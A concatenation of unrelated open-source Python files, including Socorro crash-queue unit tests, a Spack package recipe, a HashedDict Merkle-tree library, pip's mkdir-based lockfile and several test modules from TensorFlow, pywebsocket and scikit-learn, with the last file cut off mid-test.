# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import mock
from datetime import timedelta
from nose.tools import eq_
from configman.dotdict import DotDict
from socorro.processor.legacy_new_crash_source import (
LegacyNewCrashSource,
)
from socorro.external.postgresql.dbapi2_util import (
execute_no_results,
execute_query_fetchall,
)
from socorro.unittest.testbase import TestCase
def sequencer(*args):
active_iter = iter(args)
def foo(*args, **kwargs):
try:
value = active_iter.next()
except StopIteration:
raise Exception('out of values')
if isinstance(value, Exception):
raise value
return value
return foo
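# Illustrative note (not part of the original tests): sequencer() builds a
# callable that returns one canned value per call and re-raises any value
# that is an Exception instance, e.g.:
#
#     seq = sequencer(1, KeyError('boom'), 3)
#     seq()   # -> 1
#     seq()   # raises KeyError('boom')
#     seq()   # -> 3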
class TestLegacyNewCrashSource(TestCase):
def test_legacy_new_crash_source_basics(self):
m_transaction_executor_class = mock.Mock()
config = DotDict()
database = mock.Mock()
config.database_class = mock.Mock(return_value=database)
config.transaction_executor_class = m_transaction_executor_class
config.batchJobLimit = 10
LegacyNewCrashSource(config, processor_name='dwight-1234')
eq_(m_transaction_executor_class.call_count, 1)
m_transaction_executor_class.assert_called_with(
config,
database,
None)
def test_incoming_job_stream_normal(self):
config = DotDict()
config.database_class = mock.Mock()
config.transaction_executor_class = mock.Mock()
config.batchJobLimit = 10
config.logger = mock.Mock()
class StubbedIterators(LegacyNewCrashSource):
def _priority_jobs_iter(self):
while True:
yield None
def _normal_jobs_iter(self):
values = [
(1, '1234', 1),
(2, '2345', 1),
(3, '3456', 1),
(4, '4567', 1),
(5, '5678', 1),
]
for x in values:
yield x
new_crash_source = StubbedIterators(config,
processor_name='sherman1234')
expected = ('1234',
'2345',
'3456',
'4567',
'5678',
)
for x, y in zip(new_crash_source, expected):
eq_(x, ((y,), {}))
eq_(len([x for x in new_crash_source]), 5)
def test_incoming_job_stream_priority(self):
config = DotDict()
config.database_class = mock.Mock()
config.transaction_executor_class = mock.Mock()
config.batchJobLimit = 10
config.logger = mock.Mock()
class StubbedIterators(LegacyNewCrashSource):
def _normal_jobs_iter(self):
while True:
yield None
def _priority_jobs_iter(self):
values = [
(1, '1234', 1),
(2, '2345', 1),
(3, '3456', 1),
(4, '4567', 1),
(5, '5678', 1),
]
for x in values:
yield x
new_crash_source = StubbedIterators(config,
processor_name='victor1234')
expected = ('1234',
'2345',
'3456',
'4567',
'5678',
)
for x, y in zip(new_crash_source, expected):
eq_(x, ((y,), {}))
eq_(len([x for x in new_crash_source]), 5)
def test_incoming_job_stream_interleaved(self):
config = DotDict()
config.database_class = mock.Mock()
config.transaction_executor_class = mock.Mock()
config.batchJobLimit = 10
config.logger = mock.Mock()
class StubbedIterators(LegacyNewCrashSource):
def _normal_jobs_iter(self):
values = [
(1, '1234', 1),
(2, '2345', 1),
(3, '3456', 1),
(4, '4567', 1),
(5, '5678', 1),
None,
None,
]
for x in values:
yield x
def _priority_jobs_iter(self):
values = [
None,
(10, 'p1234', 1),
(20, 'p2345', 1),
None,
(30, 'p3456', 1),
(40, 'p4567', 1),
None,
None,
(50, 'p5678', 1),
None,
]
for x in values:
yield x
new_crash_source = StubbedIterators(config,
processor_name='sherman1234')
expected = ('1234',
'p1234',
'p2345',
'2345',
'p3456',
'p4567',
'3456',
'4567',
'p5678',
'5678',
)
for x, y in zip(new_crash_source, expected):
eq_(x, ((y,), {}))
eq_(len([x for x in new_crash_source]), 10)
def test_priority_jobs_iter_simple(self):
m_transaction = mock.Mock()
m_transaction_executor_class = mock.Mock(return_value=m_transaction)
config = DotDict()
config.database_class = mock.Mock()
config.transaction_executor_class = m_transaction_executor_class
config.batchJobLimit = 10
config.logger = mock.Mock()
transaction_returns = (
'priority_jobs_17',
[ # fetchall
(1, '1234', 1, None),
(2, '2345', 1, None),
(3, '3456', 1, None),
],
None, # delete
None, # delete
None, # delete
[ # nothing to do
],
[
(4, '4567', 1, None),
(5, '5678', 1, None),
],
None, # delete
None, # delete
[ # nothing to do
],
None, # drop table
)
m_transaction.side_effect = sequencer(*transaction_returns)
expected_sequence = (
(1, '1234', 1),
(2, '2345', 1),
(3, '3456', 1),
None,
(4, '4567', 1),
(5, '5678', 1),
)
new_crash_source = LegacyNewCrashSource(config,
processor_name='dwight')
for x, y in zip(new_crash_source._priority_jobs_iter(),
expected_sequence):
eq_(x, y)
expected_get_priority_jobs_sql = (
"select"
" j.id,"
" pj.uuid,"
" 1,"
" j.starteddatetime "
"from"
" jobs j right join priority_jobs_17 pj on j.uuid = pj.uuid"
)
expected_delete_one_priority_job_sql = (
"delete from priority_jobs_17 where uuid = %s"
)
expected_transactions = (
((new_crash_source._create_priority_jobs,),),
((execute_query_fetchall, expected_get_priority_jobs_sql,),),
((execute_no_results, expected_delete_one_priority_job_sql,
('1234',)),),
((execute_no_results, expected_delete_one_priority_job_sql,
('2345',)),),
((execute_no_results, expected_delete_one_priority_job_sql,
('3456',)),),
((execute_query_fetchall, expected_get_priority_jobs_sql,),),
((execute_query_fetchall, expected_get_priority_jobs_sql,),),
((execute_no_results, expected_delete_one_priority_job_sql,
('4567',)),),
((execute_no_results, expected_delete_one_priority_job_sql,
('5678',)),),
((execute_query_fetchall, expected_get_priority_jobs_sql,),),
((execute_no_results, "drop table priority_jobs_17"),),
)
for actual, expected in zip(m_transaction.call_args_list,
expected_transactions):
eq_(actual, expected)
def test_normal_jobs_iter_simple(self):
m_transaction = mock.Mock()
m_transaction_executor_class = mock.Mock(return_value=m_transaction)
config = DotDict()
config.database_class = mock.Mock()
config.transaction_executor_class = m_transaction_executor_class
config.batchJobLimit = 10
config.logger = mock.Mock()
config.pollingInterval = timedelta(0, 0, 0, 0)
transaction_returns = (
'priority_jobs_17',
[ # fetchall
(1, '1234', 1),
(2, '2345', 1),
(3, '3456', 1),
],
[ # nothing to do
],
[
(4, '4567', 1),
(5, '5678', 1),
],
None, # drop table
)
m_transaction.side_effect = sequencer(*transaction_returns)
        expected_sequence = (
(1, '1234', 1),
(2, '2345', 1),
(3, '3456', 1),
None,
(4, '4567', 1),
(5, '5678', 1),
)
new_crash_source = LegacyNewCrashSource(config,
processor_name='dwight')
new_crash_source.processor_id = 17
for x, y in zip(new_crash_source._normal_jobs_iter(),
                        expected_sequence):
eq_(x, y)
expected_get_normal_sql = (
"select"
" j.id,"
" j.uuid,"
" priority "
"from"
" jobs j "
"where"
" j.owner = 17"
" and j.starteddatetime is null "
"order by queueddatetime"
" limit 10"
)
expected_transactions = (
((new_crash_source._create_priority_jobs,),),
((execute_query_fetchall, expected_get_normal_sql,),),
((execute_query_fetchall, expected_get_normal_sql,),),
((execute_query_fetchall, expected_get_normal_sql,),),
((execute_query_fetchall, expected_get_normal_sql,),),
((execute_no_results, "drop table priority_jobs_17"),),
)
for actual, expected in zip(m_transaction.call_args_list,
expected_transactions):
eq_(actual, expected)
| mpl-2.0 |
openNSS/enigma2 | tests/events.py | 72 | 1648 | import time
import tests
recorded_events = [ ]
def event(self, name, args, kwargs):
global recorded_events
print "*EVENT*", time.time(), self, name, args, kwargs
recorded_events.append((time.time(), self, name, args, kwargs))
def eventfnc(f):
name = f.__name__
def wrapper(self, *args, **kwargs):
event(self, name, args, kwargs)
return f(self, *args, **kwargs)
return wrapper
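# Illustrative usage (an assumption, not from the original file): decorating
# a method with @eventfnc logs each call into recorded_events before
# delegating to the real implementation:
#
#     class Timer:
#         @eventfnc
#         def start(self, delay):
#             return delay
#
#     Timer().start(5)   # appends (time.time(), self, 'start', (5,), {})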
def get_events():
global recorded_events
r = recorded_events
recorded_events = [ ]
return r
def start_log():
global base_time
base_time = time.time()
def end_log(test_name):
global base_time
results = ""
for (t, self, method, args, kwargs) in get_events():
results += "%s T+%f: %s::%s(%s, *%s, *%s)\n" % (time.ctime(t), t - base_time, str(self.__class__), method, self, args, kwargs)
expected = None
try:
f = open(test_name + ".results", "rb")
expected = f.read()
f.close()
except:
print "NO TEST RESULT FOUND, creating new"
f = open(test_name + ".new_results", "wb")
f.write(results)
f.close()
print results
if expected is not None:
print "expected:"
if expected != results:
open(test_name + ".bogus_results", "wb").write(results)
raise tests.TestError("test data does not match")
else:
print "test compared ok"
else:
print "no test data to compare with."
def log(fnc, base_time = 0, test_name = "test", *args, **kwargs):
import fake_time
fake_time.setTime(base_time)
start_log()
try:
fnc(*args, **kwargs)
event(None, "test_completed", [], {"test_name": test_name})
except tests.TestError,c:
event(None, "test_failed", [], {"test_name": test_name, "reason": str(c)})
end_log(test_name)
| gpl-2.0 |
pavel-odintsov/unbound_systemd | libunbound/python/examples/mx-lookup.py | 18 | 2165 | #!/usr/bin/python
# vim:fileencoding=utf-8
'''
mx-lookup.py: Lookup for MX records
Authors: Zdenek Vasicek (vasicek AT fit.vutbr.cz)
Marek Vavrusa (xvavru00 AT stud.fit.vutbr.cz)
Copyright (c) 2008. All rights reserved.
This software is open source.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
from __future__ import print_function
import unbound
ctx = unbound.ub_ctx()
ctx.resolvconf("/etc/resolv.conf")
status, result = ctx.resolve("nic.cz", unbound.RR_TYPE_MX, unbound.RR_CLASS_IN)
if status == 0 and result.havedata:
print("Result:")
print(" raw data:", result.data)
for k in sorted(result.data.mx_list):
print(" priority:%d address:%s" % k)
status, result = ctx.resolve("nic.cz", unbound.RR_TYPE_A, unbound.RR_CLASS_IN)
if status == 0 and result.havedata:
print("Result:")
print(" raw data:", result.data)
for k in sorted(result.data.address_list):
print(" address:%s" % k)
| bsd-3-clause |
erikedin/glowing-sceptre | googletest-release-1.8.0/googlemock/scripts/generator/cpp/utils.py | 1158 | 1153 | #!/usr/bin/env python
#
# Copyright 2007 Neal Norwitz
# Portions Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generic utilities for C++ parsing."""
__author__ = 'nnorwitz@google.com (Neal Norwitz)'
import sys
# Set to True to see the start/end token indices.
DEBUG = True
def ReadFile(filename, print_error=True):
"""Returns the contents of a file."""
try:
fp = open(filename)
try:
return fp.read()
finally:
fp.close()
except IOError:
if print_error:
print('Error reading %s: %s' % (filename, sys.exc_info()[1]))
return None
| apache-2.0 |
tmerrick1/spack | var/spack/repos/builtin/packages/nextflow/package.py | 5 | 2177 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Nextflow(Package):
"""Data-driven computational pipelines"""
homepage = "http://www.nextflow.io"
url = "https://github.com/nextflow-io/nextflow/releases/download/v0.24.1/nextflow"
version('0.25.6', '29d739b6caf8ceb5aa9997310ee8d0e7',
expand=False)
version('0.24.1', '80ec8c4fe8e766e0bdd1371a50410d1d',
expand=False)
version('0.23.3', '71fb69275b6788af1c6f1165f40d362e',
expand=False)
version('0.21.0', '38e5e335cb33f05ba358e1f883c8386c',
expand=False)
version('0.20.1', '0e4e0e3eca1c2c97f9b4bffd944b923a',
expand=False)
version('0.17.3', '5df00105fb1ce6fd0ba019ae735d9617',
expand=False)
depends_on('java')
def install(self, spec, prefix):
mkdirp(prefix.bin)
install("nextflow", join_path(prefix.bin, "nextflow"))
set_executable(join_path(prefix.bin, "nextflow"))
| lgpl-2.1 |
jessstrap/servotk | tests/wpt/css-tests/tools/pywebsocket/src/test/testdata/handlers/sub/plain_wsh.py | 499 | 1789 | # Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
def web_socket_do_extra_handshake(request):
pass
def web_socket_transfer_data(request):
request.connection.write('sub/plain_wsh.py is called for %s, %s' %
(request.ws_resource, request.ws_protocol))
# vi:sts=4 sw=4 et
| mpl-2.0 |
JoEiner/hasheddict | hasheddict/__init__.py | 1 | 10088 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
from zlib import crc32
from hashlib import sha256
from math import log, ceil
import collections
import threading
__all__ = ['HashedDict']
__version__ = "0.1.0"
__author__ = "Johannes Schreiner, johannes@schreiner.io"
__credits__ = ["Johannes Schreiner"]
__url__ = "https://github.com/JoEiner/hasheddict"
__copyright__ = "(c) 2015 Johannes Schreiner"
__license__ = "GNU General Public License v3 or later (GPLv3+)"
class HashedDict(dict):
"""
A dictionary that provides cryptographic hashes of its contents.
See package documentation for usage instructions.
"""
def __init__(self, *args, **kwargs):
"""
Possible ways of instantiation:
HashedDict([algorithm[, trees_cache_size], ])
HashedDict([algorithm[, trees_cache_size], ]**kwargs)
HashedDict([algorithm[, trees_cache_size], ]iterable, **kwargs)
HashedDict([algorithm[, trees_cache_size], ]mapping, **kwargs)
@param algorithm: algorithm is a class that provides an interface
similar to hashlib.sha*() interface (see Lib/hashlib.py)
@type trees_cache_size: int
@param trees_cache_size: The number of internal trees the HashedDict buffers.
Raising this number increases memory usage, yet reduces
time consumption when the dictionary grows over its boundaries
Use only positive integers.
Examples::
            >>> a = HashedDict(one=1, two=2, three=3)
            >>> b = HashedDict(zip(['one', 'two', 'three'], [1, 2, 3]))
            >>> c = HashedDict([('two', 2), ('one', 1), ('three', 3)])
            >>> d = HashedDict({'three': 3, 'one': 1, 'two': 2})
            >>> from hashlib import md5, sha512
            >>> e = HashedDict(md5, one=1, two=2, three=3)
            >>> f = HashedDict(sha512, 1, zip(range(100000), reversed(range(100000))))
"""
dictargs = [arg for arg in args if isinstance(arg, collections.Iterable) or
isinstance(arg, collections.Mapping)]
if len(dictargs) > 1:
raise TypeError("HashedDict expected at most 1 iterable or mapping "
"argument, got %d" % len(args))
hashargs = [arg for arg in args if not isinstance(arg, collections.Iterable) and
not isinstance(arg, collections.Mapping)]
        # Take the positional hash options from hashargs so that a leading
        # mapping/iterable argument is never mistaken for the algorithm.
        self.__hashalg = hashargs[0] if len(hashargs) >= 1 else sha256
        self.__trees_cache_size = hashargs[1] if len(hashargs) >= 2 else 3
self.__key_to_hash = dict()
depth = self.__get_depth_for_length(0)
initial_tree = HashTree(self.__key_to_hash, self.__hashalg, depth)
initial_tree.start()
initial_tree.join()
self.__trees = {depth: initial_tree}
self.update(*dictargs, **kwargs)
def get_hash(self):
tree_nr = self.__get_depth_for_length(len(self))
return self.__trees[tree_nr].get_hash()
def __setitem__(self, key, value):
hash_value = self.__hash_item(key, value)
self.__key_to_hash[key] = hash_value
if key in self:
for tree in self.__trees.itervalues():
tree.delete(key, hash_value)
super(HashedDict, self).__setitem__(key, value)
for tree in self.__trees.itervalues():
tree.add(key, hash_value)
self.__manage_cached_trees()
def __delitem__(self, key):
self.__manage_cached_trees()
for tree in self.__trees.itervalues():
tree.delete(key, self.__key_to_hash[key])
del self.__key_to_hash[key]
super(HashedDict, self).__delitem__(key)
def update(self, *args, **kwargs):
if args:
if len(args) > 1:
raise TypeError("update expected at most 1 arguments, "
"got %d" % len(args))
other = dict(args[0])
for key in other:
self[key] = other[key]
for key in kwargs:
self[key] = kwargs[key]
def setdefault(self, key, value=None):
if key not in self:
self[key] = value
return self[key]
def __manage_cached_trees(self):
dict_length = len(self)
curr_depth = self.__get_depth_for_length(dict_length)
range_start = max(0, curr_depth - (self.__trees_cache_size/2))
range_end = range_start + self.__trees_cache_size
allowed_trees = set(xrange(range_start, range_end))
existing_trees = set(self.__trees.keys())
deprecated_keys = existing_trees - allowed_trees
new_keys = allowed_trees - existing_trees
for tree_key in deprecated_keys:
del self.__trees[tree_key]
for tree_key in new_keys:
new_tree = HashTree(self.__key_to_hash,
self.__hashalg, tree_key)
new_tree.start()
self.__trees[tree_key] = new_tree
@staticmethod
def __get_depth_for_length(length):
if length == 0:
return 0
else:
return int(ceil(log(length, 2)))
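    # Worked example (illustrative): the depth is the smallest d with
    # 2**d >= length, so lengths 3-4 give depth 2, lengths 5-8 give depth 3,
    # and a 9th item forces a deeper, 16-leaf tree.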
def __hash_item(self, key, value):
return (self.__hashalg(self.__hashalg(repr(key)).digest() +
self.__hashalg(repr(value)).digest()).digest())
class HashTree(threading.Thread):
def __init__(self, key_to_hash, hashalg, tree_depth):
threading.Thread.__init__(self)
self.__key_to_hash = key_to_hash.copy()
self.__tree_depth = tree_depth
self.__hashalg = hashalg
def run(self):
self.__tree = self.__build_tree()
self.__leaf_hashes = self.__build_leaf_items()
self.__rehash_all()
def get_hash(self):
self.join()
return self.__tree[0][0]
def add(self, key, hash_value):
self.join()
position = (crc32(key) & 0xffffffff) & ((1 << self.__tree_depth) - 1)
self.__leaf_hashes[position].append(hash_value)
self.__rehash(position)
def delete(self, key, hash_value):
self.join()
position = (crc32(key) & 0xffffffff) & ((1 << self.__tree_depth) - 1)
while hash_value in self.__leaf_hashes[position]:
self.__leaf_hashes[position].remove(hash_value)
self.__rehash(position)
def __build_tree(self):
tree = []
for i in xrange(self.__tree_depth+1):
current_row = [None for j in xrange(1 << i)]
tree.append(current_row)
return tree
def __build_leaf_items(self):
leaf_count = 1 << self.__tree_depth
new_leaf_items = [[] for i in xrange(leaf_count)]
for key, hash_value in self.__key_to_hash.iteritems():
position = (crc32(key) & 0xffffffff) % leaf_count
new_leaf_items[position].append(hash_value)
return new_leaf_items
def __rehash_all(self):
self.__tree[-1] = [self.__hash_leaf(leaf_items) for leaf_items in self.__leaf_hashes]
for row_nr in xrange(self.__tree_depth,0,-1):
row = self.__tree[row_nr]
for current_position in xrange(0, (len(row)+1)/2):
self.__rehash_parent(row_nr, current_position)
def __rehash(self, leaf_position):
leaf_items = self.__leaf_hashes[leaf_position]
self.__tree[-1][leaf_position] = self.__hash_leaf(leaf_items)
lchild_pos = leaf_position
for row_nr in xrange(self.__tree_depth, 0, -1):
#current_position = self.__rehash_parent(row_nr, current_position)
rchild_pos = lchild_pos | (1 << (row_nr - 1))
lchild_pos = lchild_pos & ((1 << (row_nr - 1)) - 1)
children_row = self.__tree[row_nr]
parent_row = self.__tree[row_nr-1]
parent_row[lchild_pos] = self.__hashalg(children_row[lchild_pos] + \
children_row[rchild_pos]).digest()
def __hash_leaf(self, leaf_items):
leaf_items.sort()
hashalg = self.__hashalg()
for item in leaf_items:
hashalg.update(item)
return hashalg.digest()
def __rehash_parent(self, row_nr, element_pos):
lchild_pos = element_pos & ((1 << (row_nr - 1)) - 1)
rchild_pos = element_pos | (1 << (row_nr - 1))
#parent_pos = lchild_pos
children_row = self.__tree[row_nr]
parent_row = self.__tree[row_nr-1]
#lchild_hash = children_row[lchild_pos]
#rchild_hash = children_row[rchild_pos]
#parent_row[parent_pos] = self.__hashalg(lchild_hash + \
# rchild_hash).digest()
parent_row[lchild_pos] = self.__hashalg(children_row[lchild_pos] + \
children_row[rchild_pos]).digest()
if __name__ == '__main__':
pangram = HashedDict(pangram="The quick brown fox jumps over the lazy dog")
assert pangram.get_hash() == '\xe9|\xdcJ=\xda\x84\xbd\xa6\x8e\xea\x9c=\x16\x93' + \
'x\xb2\xff9\x83S!\xfbE\xbc\x0c\x83\xb8`H\x94\xa6'
hd1 = HashedDict()
empty_hash = hd1.get_hash()
assert empty_hash == "\xe3\xb0\xc4B\x98\xfc\x1c\x14\x9a\xfb\xf4\xc8\x99" + \
"o\xb9$'\xaeA\xe4d\x9b\x93L\xa4\x95\x99\x1bxR\xb8U"
hd1["key1"] = "value1"
new_hash = hd1.get_hash()
del hd1["key1"]
assert empty_hash == hd1.get_hash()
hd2 = HashedDict(key1="value1", key2="value2")
del hd2["key2"]
assert hd2.get_hash() == new_hash
del hd2["key1"]
assert hd2.get_hash() == empty_hash
hd3 = HashedDict()
assert hd3.get_hash() == empty_hash
hashList = []
for i in xrange(1026):
hashList.append(hd3.get_hash())
hd3[str(i)] = i
for i in xrange(1025, -1, -1):
del hd3[str(i)]
assert hashList[i] == hd3.get_hash()
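    # A small extra usage sketch (illustrative, not part of the original
    # self-test): the top hash tracks every insertion and deletion.
    demo = HashedDict(sha256, alpha=1)
    hash_before = demo.get_hash()
    demo["beta"] = 2
    assert demo.get_hash() != hash_before
    del demo["beta"]
    assert demo.get_hash() == hash_before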
print "all tests successful"
| gpl-3.0 |
zasdfgbnm/tensorflow | tensorflow/python/kernel_tests/tensor_priority_test.py | 134 | 2788 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the binary ops priority mechanism."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.platform import test as test_lib
class TensorPriorityTest(test_lib.TestCase):
def testSupportedRhsWithoutDelegation(self):
class NumpyArraySubclass(np.ndarray):
pass
supported_rhs_without_delegation = (3, 3.0, [1.0, 2.0], np.array(
[1.0, 2.0]), NumpyArraySubclass(
shape=(1, 2), buffer=np.array([1.0, 2.0])),
ops.convert_to_tensor([[1.0, 2.0]]))
for rhs in supported_rhs_without_delegation:
tensor = ops.convert_to_tensor([[10.0, 20.0]])
res = tensor + rhs
self.assertIsInstance(res, ops.Tensor)
def testUnsupportedRhsWithoutDelegation(self):
class WithoutReverseAdd(object):
pass
tensor = ops.convert_to_tensor([[10.0, 20.0]])
rhs = WithoutReverseAdd()
with self.assertRaisesWithPredicateMatch(
TypeError, lambda e: "Expected float" in str(e)):
# pylint: disable=pointless-statement
tensor + rhs
def testUnsupportedRhsWithDelegation(self):
class WithReverseAdd(object):
def __radd__(self, lhs):
return "Works!"
tensor = ops.convert_to_tensor([[10.0, 20.0]])
rhs = WithReverseAdd()
res = tensor + rhs
self.assertEqual(res, "Works!")
def testFullDelegationControlUsingRegistry(self):
class NumpyArraySubclass(np.ndarray):
def __radd__(self, lhs):
return "Works!"
def raise_to_delegate(value, dtype=None, name=None, as_ref=False):
del value, dtype, name, as_ref # Unused.
raise TypeError
ops.register_tensor_conversion_function(
NumpyArraySubclass, raise_to_delegate, priority=0)
tensor = ops.convert_to_tensor([[10.0, 20.0]])
rhs = NumpyArraySubclass(shape=(1, 2), buffer=np.array([1.0, 2.0]))
res = tensor + rhs
self.assertEqual(res, "Works!")
if __name__ == "__main__":
test_lib.main()
| apache-2.0 |
johankaito/fufuka | microblog/old-flask/lib/python2.7/site-packages/pip/_vendor/lockfile/mkdirlockfile.py | 478 | 3098 | from __future__ import absolute_import, division
import time
import os
import sys
import errno
from . import (LockBase, LockFailed, NotLocked, NotMyLock, LockTimeout,
AlreadyLocked)
class MkdirLockFile(LockBase):
"""Lock file by creating a directory."""
def __init__(self, path, threaded=True, timeout=None):
"""
>>> lock = MkdirLockFile('somefile')
>>> lock = MkdirLockFile('somefile', threaded=False)
"""
LockBase.__init__(self, path, threaded, timeout)
# Lock file itself is a directory. Place the unique file name into
# it.
self.unique_name = os.path.join(self.lock_file,
"%s.%s%s" % (self.hostname,
self.tname,
self.pid))
def acquire(self, timeout=None):
timeout = timeout is not None and timeout or self.timeout
end_time = time.time()
if timeout is not None and timeout > 0:
end_time += timeout
if timeout is None:
wait = 0.1
else:
wait = max(0, timeout / 10)
while True:
try:
os.mkdir(self.lock_file)
except OSError:
err = sys.exc_info()[1]
if err.errno == errno.EEXIST:
# Already locked.
if os.path.exists(self.unique_name):
# Already locked by me.
return
if timeout is not None and time.time() > end_time:
if timeout > 0:
raise LockTimeout("Timeout waiting to acquire"
" lock for %s" %
self.path)
else:
# Someone else has the lock.
raise AlreadyLocked("%s is already locked" %
self.path)
time.sleep(wait)
else:
# Couldn't create the lock for some other reason
raise LockFailed("failed to create %s" % self.lock_file)
else:
open(self.unique_name, "wb").close()
return
def release(self):
if not self.is_locked():
raise NotLocked("%s is not locked" % self.path)
elif not os.path.exists(self.unique_name):
raise NotMyLock("%s is locked, but not by me" % self.path)
os.unlink(self.unique_name)
os.rmdir(self.lock_file)
def is_locked(self):
return os.path.exists(self.lock_file)
def i_am_locking(self):
return (self.is_locked() and
os.path.exists(self.unique_name))
def break_lock(self):
if os.path.exists(self.lock_file):
for name in os.listdir(self.lock_file):
os.unlink(os.path.join(self.lock_file, name))
os.rmdir(self.lock_file)
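# Illustrative usage (not part of the original module). os.mkdir() is atomic
# across processes, which is what makes the directory a safe lock primitive:
#
#     lock = MkdirLockFile('somefile', timeout=5)
#     lock.acquire()
#     try:
#         pass  # work with 'somefile' while holding the lock
#     finally:
#         lock.release()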
| apache-2.0 |
joshloyal/scikit-learn | sklearn/cluster/tests/test_affinity_propagation.py | 341 | 2620 | """
Testing for Clustering methods
"""
import numpy as np
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_raises
from sklearn.cluster.affinity_propagation_ import AffinityPropagation
from sklearn.cluster.affinity_propagation_ import affinity_propagation
from sklearn.datasets.samples_generator import make_blobs
from sklearn.metrics import euclidean_distances
n_clusters = 3
centers = np.array([[1, 1], [-1, -1], [1, -1]]) + 10
X, _ = make_blobs(n_samples=60, n_features=2, centers=centers,
cluster_std=0.4, shuffle=True, random_state=0)
def test_affinity_propagation():
# Affinity Propagation algorithm
# Compute similarities
S = -euclidean_distances(X, squared=True)
preference = np.median(S) * 10
# Compute Affinity Propagation
cluster_centers_indices, labels = affinity_propagation(
S, preference=preference)
n_clusters_ = len(cluster_centers_indices)
assert_equal(n_clusters, n_clusters_)
af = AffinityPropagation(preference=preference, affinity="precomputed")
labels_precomputed = af.fit(S).labels_
af = AffinityPropagation(preference=preference, verbose=True)
labels = af.fit(X).labels_
assert_array_equal(labels, labels_precomputed)
cluster_centers_indices = af.cluster_centers_indices_
n_clusters_ = len(cluster_centers_indices)
assert_equal(np.unique(labels).size, n_clusters_)
assert_equal(n_clusters, n_clusters_)
# Test also with no copy
_, labels_no_copy = affinity_propagation(S, preference=preference,
copy=False)
assert_array_equal(labels, labels_no_copy)
# Test input validation
assert_raises(ValueError, affinity_propagation, S[:, :-1])
